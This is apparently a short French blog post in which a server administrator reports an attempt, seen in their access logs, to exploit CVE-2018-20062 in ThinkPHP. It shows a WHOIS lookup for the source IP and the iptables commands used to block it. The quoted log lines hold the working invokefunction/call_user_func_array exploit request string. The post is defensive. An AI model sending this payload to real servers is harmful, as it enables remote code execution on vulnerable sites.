Faille de securité dans NoneCMS ThinkPHP : /TP/public/index.php

Je viens de voir dans mes logs une tentative l’utilisation de la faille : CVE-2018-20062 .

Dans les logs cela donne :

121.5.155.158 - - [13/Oct/2021:07:16:18 +0200] "GET /TP/public/index.php HTTP/1.1" 302 403 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:19 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50/TP/public/index.php" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:19 +0200] "GET /TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1 HTTP/1.1" 302 403 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:20 +0200] "GET /user/auth/login HTTP/1.1" 200 8187 "http://80.15.48.50/TP/public/index.php?s=index/\\think\\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:20 +0200] "POST /TP/public/index.php?s=captcha HTTP/1.1" 302 215 "-" "Go-http-client/1.1"
121.5.155.158 - - [13/Oct/2021:07:16:21 +0200] "GET /user/auth/login HTTP/1.1" 200 8189 "http://80.15.48.50/TP/public/index.php?s=captcha" "Go-http-client/1.1"
121.5.155.158 - - [13/Oct/2021:07:16:22 +0200] "GET / HTTP/1.1" 302 406 "-" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"
121.5.155.158 - - [13/Oct/2021:07:16:22 +0200] "GET /user/auth/login HTTP/1.1" 200 8190 "http://80.15.48.50:80" "Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)"

L’adresse IP : 121.5.155.158 est en chine :

route:          121.4.0.0/15
origin:         AS45090
descr:          China Internet Network Information Center
                Floor1, Building No.1 C/-Chinese Academy of Sciences
                4, South 4th Street
                Haidian District,
mnt-by:         MAINT-CNNIC-AP
last-modified:  2020-02-25T01:14:09Z
source:         APNIC

La meilleure action à faire, c’est donc :

# iptables -A INPUT -s 121.5.155.158 -j DROP
# /usr/sbin/iptables-save > /etc/iptables/rules.v4

 

Au suivant …

Laisser un commentaire

Votre adresse e-mail ne sera pas publiée. Les champs obligatoires sont indiqués avec *

Time limit is exhausted. Please reload CAPTCHA.